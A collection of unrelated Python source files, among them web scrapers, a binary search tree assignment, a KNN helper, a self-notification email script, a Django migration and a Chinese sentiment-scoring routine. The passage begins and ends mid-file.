            'post': self.s.post
        }
        # Caller's function name and line number, for log readability.
        lineno = sys._getframe().f_back.f_lineno
        called_func = sys._getframe().f_back.f_code.co_name
        method = method.lower()
        func = func_dict.get(method, None)
        if not func:
            raise Exception('method:{} error'.format(method))
        # Drop 'verify' if present (replaces the original bare try/except pass).
        kwargs.pop('verify', None)
        if not kwargs.get('timeout', None):
            kwargs['timeout'] = 30
        for _ in range(self.retry_send_request_times):
            proxies = self.get_proxy()
            kwargs['proxies'] = proxies
            l.info(
                f'{self.name} pid:{self.pid} -> retry: {_+1}, change: {self.change_proxy_times}, failed: {self.proxy_fa}, '
                f'current: {proxies["http"]}, called: {called_func}:{lineno}')
            try:
                res = func(**kwargs)
                self.proxy_fa = 0
                return res
            except Exception as e:
                self.proxy_fa += 1
                l.warning(f"request error: {e.__context__}")
                if self.proxy_request_delay:
                    l.info(f"send request sleep {self.proxy_request_delay}s.")
                    time.sleep(self.proxy_request_delay)
        raise Exception(f"failed to get page response after {self.retry_send_request_times} times....")

    def query_list_page(self, key, page):
        """Hook for subclasses: fetch one listing page."""
        pass

    def query_detail_page(self, url):
        """Hook for subclasses: fetch one detail page."""
        pass
|
# coding: UTF-8
from numpy import *
import operator
import math
import random
from os import listdir
import Knn
#from Knn import ArgSort_k
# 跟KNN差不多。只是这里的距离是已经提前算好的。还是本质还是通过KNN来模式识别。
def topk(distances, labels, k):
    """Majority vote over the labels of the k smallest distances.

    The distances are precomputed; Knn.ArgSort_k supplies the indices of
    the k nearest entries. Ties are broken by first occurrence.
    """
    nearest = Knn.ArgSort_k(distances, len(distances), k)
    votes = {}
    for rank in range(k):
        label = labels[nearest[rank]]
        votes[label] = votes.get(label, 0) + 1
    ranked = sorted(votes.items(), key=operator.itemgetter(1), reverse=True)
    return ranked[0][0]
# 加载数据。
def loadDataSet(fileName):
    """Parse a tab-delimited file into (features, labels).

    Every column but the last is a float feature; the last column is the
    float label. The file is now opened once inside a ``with`` block and
    always closed (the original opened it twice and leaked both handles).
    """
    dataMat = []
    labelMat = []
    with open(fileName) as fr:
        lines = fr.readlines()
    if not lines:
        return dataMat, labelMat
    numFeat = len(lines[0].split('\t')) - 1  # feature count = columns - 1
    for line in lines:
        curLine = line.strip().split('\t')
        dataMat.append([float(curLine[i]) for i in range(numFeat)])
        labelMat.append(float(curLine[-1]))
    return dataMat, labelMat
# 谁能告诉我这个玩意在这里干什么?!差了个float?!卖萌的么……
def loadDataSet1(fileName):
    """Parse a tab-delimited file into (features, labels) as raw strings.

    Identical to loadDataSet except that no float conversion is applied
    (useful for categorical data such as lenses.txt). The file is opened
    once and always closed, fixing the original's leaked handles.
    """
    dataMat = []
    labelMat = []
    with open(fileName) as fr:
        lines = fr.readlines()
    if not lines:
        return dataMat, labelMat
    numFeat = len(lines[0].split('\t')) - 1  # feature count = columns - 1
    for line in lines:
        curLine = line.strip().split('\t')
        dataMat.append([curLine[i] for i in range(numFeat)])
        labelMat.append(curLine[-1])
    return dataMat, labelMat
# 将各种数据标准化。转化成0-1的范围。防止某些数据权重过大。方法就是找出最大最小。然后直接算比例。
def autoNorm(dataSet):
    """Min-max normalise each column of *dataSet* into [0, 1].

    Returns (normalised data, per-column range, per-column minimum).
    """
    minVals = dataSet.min(0)
    ranges = dataSet.max(0) - minVals
    rows = dataSet.shape[0]
    shifted = dataSet - tile(minVals, (rows, 1))
    return shifted / tile(ranges, (rows, 1)), ranges, minVals
# 小测试函数。没有测试数据所以没有运行结果。
def try1():
    """Ad-hoc smoke test: exercises loadDataSet/loadDataSet1, numpy min()
    and tile() on small local data files (testSet1.txt / lenses.txt).

    Fixes the original's shadowing of the builtin ``list`` and drops the
    dead ``sortedlist = list.argsort()`` store that relied on it.
    """
    dataMat1, labelMat = loadDataSet('testSet1.txt')
    dataMat = array(dataMat1)
    m, n = shape(dataMat)
    print('dataMat[1,:]', dataMat[1, :])
    sample = array([2, 2, 4, 1, 5, 3, 2, 7])  # was named `list`, hiding the builtin
    sortd = sorted(sample, reverse=True)
    print('sortd', sortd)
    minVals = dataMat.min(0)
    print('minVals', minVals)
    DminVals = tile(minVals, (m, 1))
    dataMat, labelMat = loadDataSet1('lenses.txt')
    m, n = shape(dataMat)
    print(dataMat[1][2])
if __name__ == '__main__':
    # The original guard was `if '__name__ == __main__':` — a non-empty
    # string literal, so it was always true even on import. The final
    # Python-2 `print topk(...)` statement is also converted to a call.
    size = 100
    distances = array([random.random() * size for i in range(size)])
    labels = array([int(random.random() * 10) for i in range(size)])
    print(topk(distances, labels, 10))
|
# Advent of Code style puzzle: groups of lines are separated by blanks;
# for each group, count the union of questions anyone answered "yes" to,
# then sum the group counts.
yes_questions = set()
total_questions = 0
with open('in') as puzzle_input:  # `with` fixes the original's leaked file handle
    for line in puzzle_input:
        if line == '\n':
            # Blank line: close out the current group.
            total_questions += len(yes_questions)
            yes_questions = set()
            continue
        yes_questions |= set(line.strip())
# The final group is not followed by a blank line.
total_questions += len(yes_questions)
print(total_questions)
import socket
import os
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
# Discover this machine's outbound IP by "connecting" a UDP socket to a
# public resolver (no packets are actually sent for SOCK_DGRAM connect).
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
    s.connect(("8.8.8.8", 80))
    ip_address = s.getsockname()[0]
    print(ip_address)
finally:
    s.close()  # close even if connect/getsockname raises (original leaked it)

# Credentials come from the environment so they never live in the source.
def_email = os.getenv("EMAIL")
def_pass = os.getenv("EMAIL_PASSWORD")

msg = '{0}:8888 Jupyter server running'.format(ip_address)
def send_email(sender=def_email, email=def_email, password=def_pass,
               receiver=def_email, msg=msg):
    """Send *msg* through Gmail's SMTP submission port.

    Fixes: the connection is now always closed (server.quit() in a
    finally block), and the *sender*/*receiver* parameters are actually
    used for the From/To headers — the original ignored them and reused
    *email*. Defaults are unchanged, so default behaviour is identical.
    """
    # Ports 465 and 587 are intended for email client to email server
    # communication; 587 upgrades to TLS via STARTTLS.
    server = smtplib.SMTP('smtp.gmail.com', 587)
    try:
        # starttls() upgrades the existing insecure connection to SSL/TLS.
        server.starttls()
        server.login(email, password)
        master_message = MIMEMultipart()  # create a message
        master_message['From'] = sender
        master_message['To'] = receiver
        master_message['Subject'] = "Jupyter_Notebook"
        master_message.attach(MIMEText(msg, 'plain'))
        # Send the mail
        server.send_message(master_message)
    finally:
        server.quit()

if __name__ == '__main__':
    send_email()
|
# -*- coding: utf-8 -*-
from urllib import parse
import scrapy
from scrapy.http import Request
from articleSpider.items import ArticleItem
class JobboleSpider(scrapy.Spider):
    """Crawl blog.jobbole.com's post listing and yield article items."""
    name = 'jobbole'
    allowed_domains = ['blog.jobbole.com']
    start_urls = ['http://blog.jobbole.com/all-posts/']

    def parse(self, response):
        """Follow every post on the listing page, then the next page link."""
        for node in response.css('#archive > div.floated-thumb > div.post-thumb > a'):
            thumb_url = node.css('img::attr(src)').extract_first('')
            detail_url = node.css('::attr(href)').extract_first('')
            yield Request(url=parse.urljoin(response.url, detail_url),
                          meta={'front_image': parse.urljoin(response.url, thumb_url)},
                          callback=self.parse_detail)
        next_url = response.css(
            '#archive > div.navigation.margin-20 > a.next.page-numbers::attr(href)').extract_first('')
        if next_url:
            yield Request(url=next_url, callback=self.parse)

    @staticmethod
    def parse_detail(response):
        """Extract title, creation date and cover image from one post page."""
        article_item = ArticleItem()
        article_item['title'] = response.css('div.entry-header > h1::text').extract_first('')
        article_item['create_date'] = response.css('div.entry-meta > p::text').extract_first('').strip().replace(
            ' ·', '')
        article_item['front_image'] = [response.meta.get('front_image', '')]
        yield article_item
|
# Generated by Django 2.0.dev20170827005745 on 2017-10-03 03:18
from django.db import migrations, models
class Migration(migrations.Migration):
    """Replace Entry.orginal_index with an integer Entry.orginal_entry field.

    NOTE(review): 'orginal' (sic) matches the model field's spelling;
    renaming it here would break the migration history.
    """

    dependencies = [
        ('journals', '0001_initial'),
    ]

    operations = [
        # Drop the old index field...
        migrations.RemoveField(
            model_name='entry',
            name='orginal_index',
        ),
        # ...and add the replacement counter, defaulting to 0 for existing rows.
        migrations.AddField(
            model_name='entry',
            name='orginal_entry',
            field=models.PositiveIntegerField(default=0),
        ),
    ]
|
from __future__ import print_function
import argparse
COUNTER = 0
class Stack:
    """Minimal LIFO stack backed by a Python list."""

    def __init__(self):
        self.stack = []

    def pop(self):
        """Remove and return the top value, or None when empty."""
        return self.stack.pop() if self.stack else None

    def push(self, val):
        """Push *val*; returns None (list.append's result)."""
        return self.stack.append(val)

    def size(self):
        """Number of stored values."""
        return len(self.stack)

    def isEmpty(self):
        """True when the stack holds no values."""
        return self.size() == 0

    def __str__(self):
        return str(self.stack).strip('[]') if not self.isEmpty() else 'empty stack'
class BSTNode:
    """Single binary-search-tree node.

    ``rightSize`` counts the nodes in this node's right subtree and is
    maintained by BST.insert / BST.insert_recursive for order-statistic
    queries (kthLargest).
    """
    def __init__(self, data=''):
        self.data = data          # key stored at this node
        self.left = None          # left child (smaller keys)
        self.right = None         # right child (larger keys)
        self.rightSize = 0        # number of nodes in the right subtree
class BST:
    """Binary search tree of unique comparable keys.

    Each node tracks ``rightSize`` (node count of its right subtree),
    which kthLargest() uses for order-statistic queries.  NOTE: delete()
    does not update rightSize, so order statistics are only reliable
    before any deletion.  delete() and keysInRange() count their unit of
    work in the module-global COUNTER.
    """

    def __init__(self):
        self.root = None
        self.size = 0

    def __len__(self):
        return self.size

    def __str__(self):
        if self.root == None:
            return 'empty BST'
        str_list = [str(i) for i in inorder(self.root)]
        return '(inorder) ' + ' '.join(str_list)

    def __repr__(self):
        return 'BST: ' + self.__str__()

    def toStringRightSize(self):
        """Render '(key,rightSize)' pairs in inorder."""
        if self.root == None:
            return 'empty BST'
        str_list = ['(%d,%d)' % (i, s) for i, s in inorder_rightSize(self.root)]
        return '(inorder) ' + ' '.join(str_list)

    def insert(self, target):
        """Insert *target*; raise ValueError on a duplicate key.

        rightSize counters on the path are updated only after the walk
        completes: the original incremented them during the descent, so a
        rejected duplicate corrupted every right-ancestor's counter.
        """
        prev = None
        curr = self.root
        right_ancestors = []  # nodes whose right subtree will grow
        while curr != None:
            c = target - curr.data
            if c == 0:
                raise ValueError('Duplicate key')
            prev = curr
            if c > 0:
                right_ancestors.append(curr)
                curr = curr.right
            else:
                curr = curr.left
        for node in right_ancestors:
            node.rightSize += 1
        newNode = BSTNode(target)
        self.size += 1
        if self.root == None:
            self.root = newNode
            return
        if c < 0:
            prev.left = newNode
        else:
            prev.right = newNode

    def insert_recursive(self, target, root=None):
        """Recursive insert; returns the (possibly new) subtree root.  (P3)

        A duplicate key raises before any rightSize is touched, since the
        increments happen after the recursive call returns.
        """
        if root == None:
            self.size += 1
            return BSTNode(target)
        c = target - root.data
        if c == 0:
            raise ValueError('Duplicate key')
        if c < 0:
            root.left = self.insert_recursive(target, root.left)
        else:
            root.right = self.insert_recursive(target, root.right)
            root.rightSize += 1
        return root

    def delete(self, target):
        """Remove *target*, counting comparisons/assignments in COUNTER.  (P2)

        Fixes two crashes/corruptions in the original:
        * deleting the root with fewer than two children dereferenced
          ``prev`` (None) and read the unbound comparison sign ``c``;
        * when the inorder successor was the *direct* right child of the
          deleted node, the splice assigned ``prev.left`` and silently
          dropped the node's left subtree.
        NOTE: rightSize counters are not maintained by deletion.
        """
        global COUNTER
        # Locate the target, remembering its parent and which side we took.
        prev = None
        curr = self.root
        COUNTER += 2
        while curr != None:
            COUNTER += 1  # equal comparison
            if curr.data == target:
                break
            c = target - curr.data
            COUNTER += 1
            prev = curr
            curr = curr.left if c < 0 else curr.right
            COUNTER += 2
        if curr == None:
            raise ValueError('Target not found')
        self.size -= 1
        # At most one child: splice that child into the parent's slot.
        if curr.left == None or curr.right == None:
            child = curr.right if curr.left == None else curr.left
            if prev == None:  # deleting the root itself
                self.root = child
            elif c < 0:
                prev.left = child
                COUNTER += 1
            else:
                prev.right = child
                COUNTER += 1
            return
        # Two children: find the smallest key of the right subtree (the
        # inorder successor), copy it over the target, then detach it.
        temp = curr
        COUNTER += 1
        prev = curr
        curr = curr.right
        COUNTER += 2
        while curr.left != None:
            prev = curr
            curr = curr.left
            COUNTER += 2
        temp.data = curr.data
        # The successor has no left child; hook its right subtree into the
        # slot it occupied (right slot when it is the direct right child).
        if prev == temp:
            prev.right = curr.right
            COUNTER += 1
        else:
            prev.left = curr.right
            COUNTER += 1

    def kthLargest(self, k=1):
        """Return the k-th largest key (k=1 is the maximum).  (P6)

        Relies on rightSize counters, so results are undefined after
        delete().  Raises AttributeError on an empty tree; behaviour for
        out-of-range k is undefined, matching the original.
        """
        prev = None
        curr = self.root
        numLarger = curr.rightSize  # keys strictly larger than curr so far
        while True:
            if numLarger == k - 1:
                break
            prev = curr
            if numLarger > k - 1:
                # Too many larger keys: the answer is in the right subtree.
                curr = curr.right
                numLarger -= prev.rightSize - curr.rightSize
            else:
                # Too few: step left, passing prev and its right subtree.
                curr = curr.left
                numLarger += 1 + curr.rightSize
        return curr.data
# helper function, inorder traversal
def inorder(root):
    """Yield the keys of the subtree rooted at *root* in ascending order."""
    if root is None:
        return
    yield from inorder(root.left)   # left subtree first
    yield root.data                 # then the node itself
    yield from inorder(root.right)  # finally the right subtree
def inorder_rightSize(root):
    """Yield (key, rightSize) pairs of the subtree in ascending key order."""
    if root is None:
        return
    yield from inorder_rightSize(root.left)
    yield root.data, root.rightSize
    yield from inorder_rightSize(root.right)
# non-recursive inorder traversal
def inorder_stack(root):
    """Iterative (non-recursive) inorder traversal yielding keys in order."""
    pending = []  # explicit stack of unvisited ancestors
    node = root
    while node is not None or pending:
        # Descend to the leftmost node, remembering the path.
        while node is not None:
            pending.append(node)
            node = node.left
        node = pending.pop()
        yield node.data
        # Continue with the right subtree.
        node = node.right
# P4
def keysInRange(root, minVal, maxVal):
    """Yield keys in [minVal, maxVal], pruning subtrees that cannot match.  (P4)

    Counts the comparisons performed in the module-global COUNTER.
    """
    global COUNTER
    if root == None:
        return
    below = minVal - root.data   # <= 0 when minVal <= root
    above = root.data - maxVal   # <= 0 when root <= maxVal
    COUNTER += 2
    if below <= 0 and above <= 0:
        yield root.data          # root lies inside the range
    if below < 0:
        yield from keysInRange(root.left, minVal, maxVal)
    if above < 0:
        yield from keysInRange(root.right, minVal, maxVal)
# P5
def reverseKeys(root):
    """Mirror the tree in place: swap left/right children of every node.  (P5)"""
    if root is None:
        return
    left_child, right_child = root.left, root.right
    reverseKeys(left_child)
    reverseKeys(right_child)
    root.left, root.right = right_child, left_child
# P6
def kthLargest(root, k=1):
    """Return the k-th largest key using per-node right-subtree sizes.  (P6)

    Iterative rewrite of the recursive search: if the node has exactly
    k-1 larger keys it is the answer; otherwise descend right (too many
    larger) or left (too few), adjusting k for the keys passed over.
    """
    node, remaining = root, k
    while True:
        if node.rightSize == remaining - 1:
            return node.data
        if node.rightSize > remaining - 1:
            node = node.right
        else:
            remaining -= node.rightSize + 1
            node = node.left
def test0():
    """Build two sample BSTs and print their inorder renderings."""
    for values in ([10, 17, 3, 90, 22, 7, 40, 15],
                   [25, 10, 40, 2, 20, 30, 45, 15, 35]):
        tree = BST()
        for v in values:
            tree.insert(v)
        print(tree)
def test2():
    """Delete one key and report the work counter."""
    global COUNTER
    tree = BST()
    for v in [10, 17, 3, 90, 22, 7, 40, 15]:
        tree.insert(v)
    print(tree)
    COUNTER = 0
    tree.delete(17)
    print(tree)
    print('# of unit of work: %d' % COUNTER)
def test3():
    """Iterative vs. recursive insertion should build identical trees."""
    values = [10, 17, 3, 90, 22, 7, 40, 15]
    t1 = BST()
    for v in values:
        t1.insert(v)
    print('length: %d' % len(t1))
    print(t1)
    t2 = BST()
    for v in values:
        t2.root = t2.insert_recursive(v, t2.root)
    print('length: %d' % len(t2))
    print(t2)
def test4():
    """Range query [4, 20] over a sample tree, reporting the work counter."""
    global COUNTER
    tree = BST()
    for v in [10, 17, 3, 90, 22, 7, 40, 15]:
        tree.insert(v)
    print(tree)
    print('keys in range [4, 20]: ')
    COUNTER = 0
    for key in keysInRange(tree.root, 4, 20):
        print(key)
    print('# of unit of work: %d' % COUNTER)
def test5():
    """Mirror a sample tree in place and print it before and after."""
    tree = BST()
    for v in [10, 17, 3, 90, 22, 7, 40, 15]:
        tree.insert(v)
    print(tree)
    print('reverse keys: ')
    reverseKeys(tree.root)
    print(tree)
def test6():
    """Print the k-th largest key for every valid k of a sample tree."""
    tree = BST()
    for v in [10, 17, 3, 90, 22, 7, 40, 15]:
        tree.insert(v)
    print(tree)
    for k in range(1, len(tree) + 1):
        print('%d-th largest: %d' % (k, kthLargest(tree.root, k)))
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    # nargs='?' makes the positional optional so the declared default is
    # actually usable — a bare positional ignores `default` and is required.
    parser.add_argument('test_number', type=int, nargs='?', default=0)
    opt = parser.parse_args()
    # Dispatch by name lookup instead of eval() on user-controlled input.
    globals()['test%d' % opt.test_number]()
|
def fib(n):
    """Return the n-th Fibonacci number (fib(1) == fib(2) == 1).

    Naive double recursion — exponential time; fine for small n.
    """
    if n == 1 or n == 2:
        return 1
    return fib(n - 1) + fib(n - 2)

# Python-2 `print fib(...)` statements converted to calls so the script
# also runs under Python 3.
print(fib(1))
print(fib(8))
|
import csv
import os
import re
import shutil
import sys
import timeit
import urllib.request
class Scrape:
    """Download images listed in a CSV, appending successes and failures
    to separate output CSVs.

    Input rows are expected to carry the image URL in column 1; each image
    is saved under *outdir*, sharded by the first character of its
    flattened name.
    """

    def __init__(self, infile, outfile, errfile, outdir):
        self.infile = infile
        self.errfile = errfile
        self.outfile = outfile
        self.outdir = outdir

    def clean(self):
        """Interactively delete the previous output and error files."""
        run = input("Are you sure you want to delete " + self.outfile + " and " + self.errfile + "? (y/n) ")
        if run.lower() == "y":
            print("Started clean...")
            if os.path.isfile(self.outfile):
                os.remove(self.outfile)
            if os.path.isfile(self.errfile):
                os.remove(self.errfile)
            print("Finished clean...")
        else:
            print("Skipping clean...")

    def scrape(self):
        """Process every input row, appending results to the out/err CSVs."""
        print("Started scraping...")
        start = timeit.default_timer()
        with open(self.outfile, "a") as outf, open(self.errfile, "a") as errf:
            out_writer = csv.writer(outf)
            err_writer = csv.writer(errf)
            for line in self.get_line():
                result = self.process_line(line)
                if 'err' in result:
                    err_writer.writerow(line + [result['err']])
                else:
                    out_writer.writerow(line + [result['fpath']])
        stop = timeit.default_timer()
        print("Finished scraping...")
        print("Time: ", stop - start)

    def process_line(self, row):
        """Fetch one row's image, preferring the '~original' variant.

        Returns {'row', 'fpath'} on success or {'row', 'url', 'err'} on
        failure / duplicate.  NOTE(review): assumes row[1] is a URL with
        at least five '/' separators — re.match returns None otherwise
        and .group(1) would raise AttributeError.
        """
        orig_url = row[1] + "~original"
        # Flatten everything after the fifth '/' into a single file name.
        name_slashes = re.match(r"(?:.*?\/){5}(.*)", row[1]).group(1)
        name = re.sub(r"\/", "_", name_slashes)
        subdir = os.path.join(self.outdir, name[:1])
        path = os.path.join(subdir, name)
        if not os.path.exists(subdir):
            os.makedirs(subdir)
        if not os.path.isfile(path):  # Don't download the image again if it's already been fetched
            try:
                return self.process_image(row, orig_url, path)
            except Exception:
                # Narrowed from a bare `except:`, which also swallowed
                # SystemExit / KeyboardInterrupt.
                try:
                    return self.process_image(row, row[1], path)
                except Exception as err:
                    return {'row': row, 'url': row[1], 'err': err}
        return {'row': row, 'url': row[1], 'err': "File has already been downloaded"}

    def process_image(self, row, url, fpath):
        """Stream *url* into *fpath*; returns the success record."""
        with urllib.request.urlopen(url) as img, open(fpath, 'wb') as f:
            shutil.copyfileobj(img, f)
        return {'row': row, 'fpath': fpath}

    def get_line(self):
        """Yield rows of the input CSV one at a time."""
        with open(self.infile, "r") as f:
            reader = csv.reader(f)
            for row in reader:
                yield row
if __name__ == "__main__":
    # Smoke run: scrape the sample input CSV, writing results to ../outputs
    # and the downloaded images to ../images.
    test = Scrape("../inputs/test-in.csv", "../outputs/output.csv", "../outputs/errors.csv", "../images/")
    test.clean()
    test.scrape()
|
import pandas as pd
import requests
from bs4 import BeautifulSoup
# Scrape the NWS seven-day forecast for one location and save it as CSV.
page = requests.get('https://forecast.weather.gov/MapClick.php?lat=34.10275767047926&lon=-118.33700636828377#.X0NkPhHhVNg')
soup = BeautifulSoup(page.content, 'html.parser')
week = soup.find(id='seven-day-forecast-body')
items = week.find_all(class_='tombstone-container')

def _tombstone_texts(css_class):
    """Text of *css_class* inside every forecast tombstone, in page order."""
    return [item.find(class_=css_class).get_text() for item in items]

# Sanity check: show the first forecast period's three fields.
for _cls in ('period-name', 'short-desc', 'temp'):
    print(items[0].find(class_=_cls).get_text())

period_names = _tombstone_texts('period-name')
short_descriptions = _tombstone_texts('short-desc')
temperatures = _tombstone_texts('temp')
print(period_names)
print(short_descriptions)
print(temperatures)

weather_stuff = pd.DataFrame(
    {
        'period': period_names,
        'short_descriptions': short_descriptions,
        'temperatures': temperatures
    })
print(weather_stuff)
weather_stuff.to_csv('weather.csv')
|
import json
# Read a class-hierarchy description: a single stdin line holding a JSON
# array of {"name": ..., "parents": [...]} objects; print, per class, how
# many classes it covers (itself plus all distinct descendants).
raw = input()  # the original rebound the builtin `input` here
data = json.loads(raw)

classs = dict()   # class name -> list of direct parent names
offspr = dict()   # class name -> 1 + number of distinct descendants
check = dict()    # class name -> descendants already credited (incl. itself)

def checking(name, elem):
    """Credit *elem* as a descendant of every ancestor of *name*, once each."""
    for parent in classs[name]:
        if elem not in check[parent]:
            check[parent].append(elem)
            offspr[parent] += 1
            checking(parent, elem)

for entry in data:
    classs[entry['name']] = entry['parents']
    offspr[entry['name']] = 1
    check[entry['name']] = [entry['name']]

for name in classs:
    checking(name, name)

# sorted() replaces the manual key-list build of the original.
for class_name in sorted(classs):
    print(str(class_name) + ' : ' + str(offspr[class_name]))
# -*- coding: utf-8 -*-
#
# OpenTransfr documentation build configuration file, adapted from a
# sphinx-quickstart template (originally generated Sun Nov 23 20:35:21 2014).
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import codecs
import os
import re
import sys
# NOTE(review): codecs/os/re/sys are unused in this excerpt — presumably
# consumed further down the config file; confirm before removing.

# -- General configuration ------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.intersphinx',
    'sphinx.ext.todo',
    'sphinx.ext.coverage',
    'sphinx.ext.viewcode',
]

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'OpenTransfr'
copyright = u'2016, OpenTransfr Project'
|
class URLS:
    """Disney World dining endpoints used by the availability client."""
    restaurants = 'https://disneyworld.disney.go.com/dining/'
    token = 'https://disneyworld.disney.go.com/authentication/get-client-token/'
    availability = 'https://disneyworld.disney.go.com/finder/dining-availability/'
# Header sent with every request so the server treats it as an AJAX call.
DEFAULT_HEADER = {'X-Requested-With': 'XMLHttpRequest'}

# Prefer the faster lxml parser when installed; otherwise fall back to the
# parser bundled with the standard library.
try:
    import lxml
except ImportError:
    BS_LEXER = 'html.parser'
else:
    BS_LEXER = 'lxml'

KEYRING_SERVICE = 'disney.api'
import time
import sys
def TripletFinder(SourceFile, length=100000, out_file=None):
    """Write every zero-sum triplet among the first *length* integers of
    *SourceFile* (one integer per line) to *out_file*.

    The numbers are sorted and scanned with a two-pointer sweep; each
    triplet (a, b, c) with a + b + c == 0 is written as a line "a b c".
    The Previous* trackers skip duplicate-valued triplets.

    *length* and *out_file* generalise the previously hard-coded count and
    module-global output handle; the defaults preserve the old behaviour
    (out_file=None falls back to the global TripletFile). The redundant
    trailing File.close() inside the `with` block was removed.
    """
    out = out_file if out_file is not None else TripletFile
    numbers = []
    previous_i = previous_j = previous_k = 101
    with open(SourceFile) as src:
        for _ in range(length):
            numbers.append(int(src.readline()))
    numbers.sort()
    for i in range(length - 2):
        if numbers[i] != previous_i:
            j = i + 1
            k = length - 1
            while j <= k:
                # Skip pairs whose values match the last written triplet.
                if previous_j == numbers[j] and previous_k == numbers[k]:
                    k -= 1
                else:
                    total = numbers[i] + numbers[j] + numbers[k]
                    if total > 0:
                        k -= 1
                    elif total < 0:
                        j += 1
                    else:
                        out.write("{} {} {}\n".format(numbers[i], numbers[j], numbers[k]))
                        previous_j = numbers[j]
                        previous_k = numbers[k]
                        j += 1
            previous_i = numbers[i]
# time.clock() was removed in Python 3.8; perf_counter() is the documented
# replacement for wall-clock benchmarking.
start_time = time.perf_counter()
with open("Triplets.txt", "w") as TripletFile:
    for files in range(100):
        Source = "file" + str(files + 1) + ".txt"
        TripletFinder(Source)
        # Same-line progress indicator (100 files, so the count is a percent).
        sys.stdout.write("\r" + str(files + 1) + "%")
        sys.stdout.flush()
# The redundant TripletFile.close() was dropped: `with` already closed it.
print()
print("execution time: {:.2f} seconds".format(time.perf_counter() - start_time))
import math
import jieba
from openpyxl import load_workbook
import re
def count_min(i, j, sen_word, degree_word, not_words, degree_dict, word_list_2, a, sigma):
    """Distance-weighted sentiment contribution of the word at index j.

    The sentiment score sen_word[j] is decayed by a Gaussian of the
    distance between j and the entity position a; negation words between
    i and j flip the sign and degree adverbs in that span scale it.
    """
    negations = 0
    degree_total = 0
    decay = math.exp(-math.pow(j - a, 2) / (2 * math.pow(sigma, 2)))
    for m in range(i + 1, j):
        token = word_list_2[m]
        if token in not_words:
            negations += 1
        elif token in degree_dict:
            degree_total = degree_total + degree_word[m]
    sign = math.pow(-1, negations)
    weight = 1 if degree_total == 0 else degree_total
    return sign * weight * sen_word[j] * decay
def count_min_1_1(a, j, sen_word, degree_word, not_words, degree_dict, word_list_2, sigma):
    """Sentiment of the single word at j for an entity at a < j.

    Same weighting as count_min but scanning the span (a, j): negations
    flip the sign, degree adverbs scale, and a Gaussian of |j - a| decays.
    """
    negations = 0
    degree_total = 0
    decay = math.exp(-math.pow(j - a, 2) / (2 * math.pow(sigma, 2)))
    for m in range(a + 1, j):
        token = word_list_2[m]
        if token in not_words:
            negations += 1
        elif token in degree_dict:
            degree_total = degree_total + degree_word[m]
    sign = math.pow(-1, negations)
    weight = 1 if degree_total == 0 else degree_total
    return sign * weight * sen_word[j] * decay
def count_min_1_2(j, a, sen_word, degree_word, not_words, degree_dict, word_list_2, sigma):
    """Sentiment of the single word at j for an entity at a > j.

    Mirror of count_min_1_1: scans the span (j, a) for negations and
    degree adverbs, with the same Gaussian distance decay.
    """
    negations = 0
    degree_total = 0
    decay = math.exp(-math.pow(j - a, 2) / (2 * math.pow(sigma, 2)))
    for m in range(j + 1, a):
        token = word_list_2[m]
        if token in not_words:
            negations += 1
        elif token in degree_dict:
            degree_total = degree_total + degree_word[m]
    sign = math.pow(-1, negations)
    weight = 1 if degree_total == 0 else degree_total
    return sign * weight * sen_word[j] * decay
def judge_line(sentiment_dict, line):
    """Score the sentiment of *line* toward the entity '百度' (Baidu).

    For every occurrence of the entity, sentiment words are combined with
    negation flips, degree-adverb scaling and a Gaussian distance decay
    (sigma = 21) via the count_min* helpers; the per-entity averages are
    then averaged. Returns 0 when the line has no sentiment words.

    NOTE(review): raises ZeroDivisionError when the line contains no
    '百度' token, and sum_emotion is not reset between entities — confirm
    whether accumulating across entities is intended.
    """
    sigma = 21
    # Negation and degree-adverb lexicons (hard-coded Windows paths).
    not_words = [w.strip() for w in open('D:/success/ciku/notDict.txt').readlines()]
    degree_words = open('D:/success/ciku/degreeDict.txt').readlines()
    degree_dict = {}
    for w in degree_words:
        word, score = w.strip().split(' ')
        degree_dict[word] = float(score)
    # Register the entity and negation words so jieba keeps them whole.
    jieba.add_word('百度')
    for word in not_words:
        jieba.add_word(word)
    # Strip ASCII and full-width punctuation before segmentation.
    line = re.sub('[\s+\.\!\/_$%^*(+\"\')]+|[+——()?【】“”!。,?、~@#¥%……&*()]+', "", line)
    word_list = jieba.cut(line)
    word_list = [w for w in word_list]
    # Keep only the tokens that matter: sentiment, degree, negation, entity.
    word_list_2 = []
    for word in word_list:
        if word in sentiment_dict:
            word_list_2.append(word)
        elif word in degree_dict:
            word_list_2.append(word)
        elif word in not_words:
            word_list_2.append(word)
        elif word == '百度':
            word_list_2.append(word)
    # Position -> score maps over the filtered token list.
    sen_word = {}
    not_word = {}
    degree_word = {}
    for index, word in enumerate(word_list_2):
        if word in sentiment_dict and word not in not_words and word not in degree_dict:
            sen_word[index] = sentiment_dict[word]
        elif word in not_words and word not in degree_dict:
            not_word[index] = -1
        elif word in degree_dict:
            degree_word[index] = degree_dict[word]
    if (len(sen_word) == 0):
        return 0
    sum_emotion = 0
    sen_loc = list(sen_word.keys())
    entities = []
    sum_entity = 0
    # All positions of the entity within the filtered list.
    for a in range(0, len(word_list_2)):
        if (word_list_2[a] == '百度'):
            entities.append(a)
    for a in entities:
        # Single sentiment word: weight it by its distance to the entity.
        if (len(sen_loc) == 1):
            if a < sen_loc[0]:
                sum_emotion = count_min_1_1(a,sen_loc[0],sen_word,degree_word,not_words,degree_dict,word_list_2,sigma)
            if a > sen_loc[0]:
                sum_emotion = count_min_1_2(sen_loc[0],a,sen_word,degree_word,not_words,degree_dict,word_list_2,sigma)
        # Multiple sentiment words: sum contributions over adjacent pairs.
        for i in range(0, len(sen_loc) - 1):
            sum_emotion = sum_emotion + count_min(sen_loc[i], sen_loc[i + 1], sen_word, degree_word, not_words, degree_dict,
                                                  word_list_2, a, sigma)
        avg_emotion = sum_emotion / len(sen_loc)
        sum_entity = sum_entity + avg_emotion
    return sum_entity / len(entities)
def in_or_not_in_line(sentiment_words, line):
